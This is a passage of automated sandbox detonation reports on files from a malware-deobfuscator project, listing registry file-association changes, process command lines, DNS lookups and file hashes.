Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\notobf.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\notobf.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\notobf.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 117e077e131f4944fe657e25cc62cbc4
SHA1 db0f6e2d6834ff036ddd6b12dd35845e867895d3
SHA256 fd48179755b13108202ccdafcaec92f67a8c40c13f96157681893fe23a05d28a
SHA512 9bcfb5d2c0b2c570c8efdb0274d036eb54fdffeda174bf6914036bd691ef630c659200e197ba45d31c9df34b15bbea1e13b067c80e05803a761532d2b2298866

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240426-en

Max time kernel

93s

Max time network

101s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\other.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\other.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 224.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

119s

Max time network

121s

Command Line

java -jar "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\fernflower.jar"

Signatures

N/A

Processes

C:\Windows\system32\java.exe

java -jar "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\fernflower.jar"

Network

N/A

Files

memory/1740-2-0x0000000002580000-0x00000000027F0000-memory.dmp

memory/1740-11-0x0000000000360000-0x0000000000361000-memory.dmp

memory/1740-12-0x0000000002580000-0x00000000027F0000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

117s

Max time network

126s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\deobf.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\deobf.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\deobf.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\deobf.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 ab1f4136fb88305b9923b2892f7111ce
SHA1 273e11522f5f2b5e7f9d53ee5e0906090dcf6891
SHA256 aac22fea6ed8418ebabdca9c974c88d1d4cecf3ce4f9e89a086d3d53d0417b40
SHA512 4639ce946697ef7896700ccea8890b0699b1e6b6134293d2c526a1917cb6be0263a76f81f43ede4419d339aee1e8e1af60fa8cd57e239bed33a2f26336dbd80b

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

156s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\ben.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\ben.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 243.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp

Files

N/A